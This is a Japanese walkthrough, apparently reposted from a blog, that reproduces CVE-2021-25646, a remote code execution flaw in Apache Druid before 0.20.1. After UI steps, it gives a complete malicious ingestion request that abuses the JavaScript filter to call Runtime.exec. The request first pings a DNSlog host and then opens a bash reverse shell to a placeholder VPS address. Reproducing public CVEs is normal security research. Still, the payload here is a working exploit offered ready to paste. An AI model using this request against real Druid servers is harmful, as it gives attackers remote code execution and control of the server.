Apache Druidリモートコマンド実行の脆弱性の再現(CVE-2021-25646)

脆弱性の概要

Apache Druidは、分散データ処理システムです。Apache Druidには、ユーザーが提供したJavaScriptを実行し、さまざまなタイプのリクエストに埋め込まれるコードが含まれています。Druid 0.20.0以前のバージョンでは、ユーザーは悪意のあるリクエストを送信し、ApacheDruidの脆弱性を悪用して任意のコードを実行します。攻撃者は、悪意のあるリクエストを直接作成して、任意のコードを実行し、サーバーを制御する可能性があります。

影響を受けるバージョン

Apache Druid <0.20.1

脆弱性の再発

ポート8888にアクセスし、ApacheDruidホームページにアクセスします。
ここに画像の説明を挿入

左上Load dataをクリックしLocal disk、をクリックしてから、右をクリックしますConnect data
ここに画像の説明を挿入

右側のフォームに記入してください。

Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz

ここに画像の説明を挿入
ここに画像の説明を挿入
ここに画像の説明を挿入

送信後のデータを
置き換えるDNSLpgテスト

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping dmlxi5.dnslog.cn -c 1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

ここに画像の説明を挿入
ここに画像の説明を挿入

リバースシェルテスト
に置き換えexec('ping dmlxi5.dnslog.cn -c 1')
exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/VPS_IP/VPS_PORT 0>&1')
ここに画像の説明を挿入
ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/weixin_44146996/article/details/113705814